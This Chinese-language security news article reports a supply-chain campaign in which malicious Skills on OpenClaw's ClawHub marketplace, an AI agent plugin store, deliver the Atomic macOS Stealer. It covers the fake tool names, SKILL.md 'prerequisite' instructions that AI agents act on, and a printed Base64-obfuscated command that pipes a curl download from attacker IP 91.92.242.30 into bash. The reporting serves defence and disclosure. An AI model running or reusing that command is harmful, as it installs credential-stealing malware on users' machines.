快速发展的开源AI Agent平台OpenClaw正面临严重的供应链风险,攻击者已在其ClawHub插件市场投放恶意Skills模块。安全公司SlowMist和Koi Security发现数百个遭篡改的扩展程序正在传播Atomic Stealer等信息窃取程序。OpenClaw允许本地AI Agent通过ClawHub托管的Skills模块扩展实现工作流自动化、服务交互和设备控制。这些技能遵循AgentSkills规范,主要以包含可执行指令的SKILL.md文件夹形式存在,而非可审计的代码。这种设计将Markdown从文档转变为操作入口点,极易被滥用。ClawHub宽松的上传流程缺乏严格审核,其漏洞模式与npm或VS Code市场类似。该平台近期用户激增,同时吸引了开发者和攻击者。Koi Security扫描了2,857个ClawHub Skills,发现341个恶意样本,感染率达12%,该行动被命名为ClawHavoc。SlowMist整合了400多个样本的IOC指标,确认472个受影响Skills共享基础设施。恶意Skills特征
恶意Skills主要集中在加密货币工具(如Solana追踪器、Phantom钱包)、YouTube实用程序、Polymarket机器人以及"clawhub1"等仿冒名称。它们伪装成更新程序、安全检查或财务工具以规避检测。
攻击链分析
攻击者在SKILL.md的"前提条件"中嵌入两阶段载荷。用户执行Base64混淆的命令(如echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash)会触发curl | bash下载。第一阶段投放器从91.92.242.30等IP获取脚本,随后下载第二阶段二进制文件(如x5ki60w1ih838sp7)。根据SlowMist分析,这些临时签名的Mach-O通用文件与Atomic macOS Stealer(AMOS)匹配,会窃取桌面/文档数据,通过socifiapp.com等C2服务器外传,并盗取钥匙串和浏览器凭证。动态分析显示,攻击者会弹出密码钓鱼对话框,将.txt/.pdf文件打包为ZIP,并通过curl上传。域名/IP的重复使用(如91.92.242.30与Poseidon勒索组织关联)表明这是有组织的行动。一个流行的"X(Twitter)趋势"Skill隐藏了仿冒配置输出的Base64后门。解码后会从91.92.242.30/q0c7ew2ro8l2cfqp下载针对macOS文件夹的窃取程序dyrtvwjfveyxjf23。这种方法可规避关键词扫描并实现载荷快速替换。威胁指标(IOC)
域名IOC
URL IOC
IP IOC
参考来源:
OpenClaw Becomes New Target in Rising Wave of Supply Chain Poisoning Attacks
https://cybersecuritynews.com/openclaw-supply-chain-attacks/
